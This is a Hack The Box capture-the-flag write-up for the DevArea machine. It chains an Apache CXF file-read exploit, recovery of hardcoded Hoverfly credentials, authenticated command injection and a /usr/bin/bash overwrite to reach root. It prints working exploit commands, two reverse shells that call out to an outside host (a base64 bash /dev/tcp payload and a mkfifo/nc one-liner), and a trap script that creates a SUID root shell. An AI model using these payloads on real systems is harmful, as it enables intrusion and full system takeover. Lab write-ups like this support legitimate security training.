
Hack The Box DevArea Writeup | HTB Guide and Exploit Path

A full Hack The Box DevArea writeup covering reconnaissance, LFI, credential harvesting, initial access, and privilege escalation on the HTB machine.

Hack The Box DevArea Writeup

This writeup covers the full DevArea exploit path, from enumeration to root, and concentrates on the practical attack flow used to compromise the target.

Quick Summary

The box exposed FTP, SSH, HTTP and a Jetty-hosted application service. Virtual host discovery, anonymous FTP access and analysis of an employee-service JAR pointed at an SSRF/LFI bug in Apache CXF, which was used to read local files and recover the Hoverfly admin credentials from its systemd unit. Those credentials enabled authenticated command execution in Hoverfly, giving a shell as dev_ryan, and the final privilege escalation combined a passwordless sudo entry with write access to /usr/bin/bash.

1. Reconnaissance & Enumeration

The attack began with a standard Nmap scan against the target IP (10.129.29.105), revealing several exposed services:

  • Port 21: FTP (Anonymous login allowed)
  • Port 22: SSH
  • Port 80: HTTP
  • Port 8080: HTTP-Proxy (Jetty)
  • Port 8888: Hoverfly Web Interface

Virtual host fuzzing with ffuf showed that the web server routes requests for devarea.htb, so that name was mapped to the target IP (in /etc/hosts) for the rest of the engagement. Directory fuzzing on port 80 uncovered an /assets directory.

Logging into the FTP server anonymously (ftp 10.129.29.105, user anonymous) yielded a file named employee-service.jar. Analysis of the JAR showed a web service built on Apache CXF in a version affected by CVE-2022-46364: CXF before 3.4.10 / 3.5.5 resolves the href attribute of xop:Include elements in MTOM requests on the server side, so an attacker can point it at http:// URLs (SSRF) or file:// URLs (local file read).

Vulnerability Overview

The main issues in this Hack The Box DevArea writeup were:

  • Anonymous FTP exposure of an application JAR
  • SSRF/LFI file read via the employee service endpoint
  • Hardcoded service credentials recovered from a systemd unit file
  • Authenticated command injection in Hoverfly
  • A passwordless sudo entry for a script that invokes bash, combined with write access to /usr/bin/bash

2. Initial Foothold (LFI to Credential Harvesting)

With the CVE identified, an exploit script (CVE-2022-46364.py) was pointed at the /employeeservice endpoint on port 8080. Its -s argument is the URL the server is made to fetch; with file:// URLs this gives arbitrary file read with the privileges of the Java process.

Validating the LFI:

python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/passwd -d devarea.htb

This successfully returned the /etc/passwd file, confirming the presence of the user dev_ryan.

Extracting Hardcoded Credentials: Knowing Hoverfly was running on port 8888, the LFI was used to read the systemd service file responsible for starting it.

python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb

The output revealed the exact command used to start the service, with administrator credentials hardcoded on the command line:

ExecStart=/opt/HoverFly/hoverfly -add -username admin -password O7IJ27MyyXiU

Credentials Recovered

For readers skimming the exploit chain, the key credential recovered from the HTB DevArea host was:

  • Username: admin
  • Password: O7IJ27MyyXiU

3. User Compromise (dev_ryan)

With the admin : O7IJ27MyyXiU credentials in hand, the focus shifted to the Hoverfly service on port 8888. The installed Hoverfly is affected by CVE-2025-54123, an authenticated command injection flaw: anyone who can log in to the admin interface can run operating-system commands as the account the service runs under, which on this box is dev_ryan.

Testing Code Execution:

./CVE-2025-54123.sh -t http://devarea.htb:8888 -u admin -p O7IJ27MyyXiU -c "id"
# Output: uid=1001(dev_ryan) gid=1001(dev_ryan) groups=1001(dev_ryan)

Catching the Reverse Shell: To gain an interactive session, a base64-encoded bash reverse shell was injected and executed. The payload decodes to bash -i >& /dev/tcp/10.10.15.227/4444 0>&1; encoding it avoids quoting problems as the command passes through the exploit's HTTP request.

./CVE-2025-54123.sh -t http://devarea.htb:8888 -u admin -p O7IJ27MyyXiU -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4yMjcvNDQ0NCAwPiYxCg== | base64 -d | bash"

A listener on Kali (nc -lvnp 4444) caught the connection, providing a shell as dev_ryan.

Why This Step Matters

This stage turns the box from a file-read-only finding into real code execution. For a Hack The Box writeup or guide, this is the pivot point where reconnaissance becomes an interactive foothold.


4. Privilege Escalation (Root)

Post-exploitation enumeration revealed a few interesting artifacts, including a syswatch.zip file containing an environment configuration (/etc/syswatch.env) with an admin password. However, the primary escalation vector lay in a misconfiguration involving sudo and the /usr/bin/bash binary.

The user dev_ryan could run /opt/syswatch/syswatch.sh web-status as root via sudo without a password (visible with sudo -l). More unusually, dev_ryan also had write permission on the system's shell binary itself, /usr/bin/bash.

The plan was to replace /usr/bin/bash with a script of our choosing: when the sudo-allowed syswatch.sh invoked bash internally, root would execute the planted script instead of a shell.

The "Text File Busy" Problem

Because the initial reverse shell was spawned with bash, /usr/bin/bash was mapped as the executable image of a running process. Linux refuses to open such a file for writing: open() fails with ETXTBSY ("Text file busy"), so the overwrite was blocked. Every running bash on the box holds that lock, including the shell used to attempt the write.

The Two-Shell Bypass ("The Escape Pod")

To bypass the lock, a second reverse shell had to be spawned using /bin/sh instead of bash. This works because /bin/sh on the box is not bash (on Debian and Ubuntu it is dash); check where /bin/sh points before relying on it.

From the initial dev_ryan bash shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.227 9002 >/tmp/f &

Once the second shell was caught on port 9002 (safely anchored to sh), the original bash process was identified and assassinated to free the file. Killing it also drops the first reverse shell, which is why the sh session had to exist first. Note that dev_ryan can only kill dev_ryan's own processes: if another user's bash were running, lsof would list it, but the lock would stay.

lsof /usr/bin/bash
kill -9 <PID>

The SUID Trap

With the file unlocked, a backup of the real bash binary was made first: it is the shell that becomes the SUID copy, and it is also the only way to restore /usr/bin/bash afterwards. Then /usr/bin/bash was overwritten with a script that copies the backup to /tmp and sets the SUID bit on it.

# 1. Back up the real shell
cp /usr/bin/bash /tmp/bash.bak

# 2. Plant the malicious script
cat > /usr/bin/bash << 'EOF'
#!/bin/sh
cp /tmp/bash.bak /tmp/rootbash
chmod 4755 /tmp/rootbash
EOF
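The lock and the kill-then-overwrite sequence can be reproduced safely before touching a real target. The following added example (not from the writeup) runs the two steps above against a throwaway copy of the sleep binary in a temp directory rather than /usr/bin/bash: it probes the file for writability while the copy is running (ETXTBSY), lists the holding process through /proc the way lsof would, kills it, and then plants the same trap script. The victim binary, temp paths and the busybox handling are assumptions of the demo.

```python
"""Added example, not from the writeup: reproduce the 'Text file busy' lock
and the kill-then-overwrite sequence on a throwaway copy of an executable
instead of /usr/bin/bash. The victim binary (a copy of sleep) and the temp
paths are assumptions of the demo; the trap script is the one the writeup
plants.
"""
import errno
import os
import shutil
import subprocess
import tempfile

TRAP_SCRIPT = "#!/bin/sh\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n"


def probe_write(path):
    """Open for writing without O_TRUNC: a non-destructive probe.
    Returns None on success, otherwise the errno (ETXTBSY while some
    process is executing the file)."""
    try:
        os.close(os.open(path, os.O_WRONLY))
        return None
    except OSError as err:
        return err.errno


def holders(path):
    """PIDs whose main executable is `path`: what `lsof path` lists, via /proc
    for targets without lsof. Other users' processes are skipped because their
    /proc/<pid>/exe is unreadable, which is exactly the case kill cannot fix."""
    target = os.path.realpath(path)
    found = []
    for pid in os.listdir("/proc"):
        if pid.isdigit():
            try:
                if os.readlink(f"/proc/{pid}/exe") == target:
                    found.append(int(pid))
            except OSError:
                pass
    return found


def demo():
    work = tempfile.mkdtemp()
    src = os.path.realpath(shutil.which("sleep"))
    victim = os.path.join(work, os.path.basename(src))  # keep the name: busybox dispatches on argv[0]
    shutil.copy(src, victim)                             # copies mode bits too, so it stays executable
    argv = [victim, "sleep", "60"] if victim.endswith("busybox") else [victim, "60"]
    # Popen returns only after the child's exec succeeded, so the lock is held here.
    proc = subprocess.Popen(argv)
    result = {"busy": probe_write(victim) == errno.ETXTBSY,
              "seen_by_holders": proc.pid in holders(victim)}
    proc.kill()                                          # the writeup's lsof + kill -9, on our own process
    proc.wait()
    result["free_after_kill"] = probe_write(victim) is None
    shutil.copy(victim, victim + ".bak")                 # 1. back up the real binary
    with open(victim, "w") as fh:                        # 2. plant the trap (truncates in place)
        fh.write(TRAP_SCRIPT)
    with open(victim) as fh:
        result["planted"] = fh.read().startswith("#!/bin/sh")
    shutil.rmtree(work)
    return result


if __name__ == "__main__":
    print(demo())
```

probe_write opens with O_WRONLY only, so on a real target it tells you whether the overwrite will succeed without risking a partial truncation of the shell binary.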

Execution and Capture

The trap was sprung by invoking the vulnerable script via sudo. When syswatch.sh invoked bash, the kernel handed execution to the planted script with root privileges, triggering the payload.

sudo /opt/syswatch/syswatch.sh web-status

The payload created /tmp/rootbash with the SUID bit set. Because bash resets its effective UID to the real UID at startup when the two differ, the binary has to be run with -p (privileged mode) to keep the root EUID. Once root, copy the real binary back from /tmp/bash.bak: until then every bash invocation on the box, including the sudo script itself, runs the trap instead of a shell.

/tmp/rootbash -p
whoami
# Output: root
cat /root/root.txt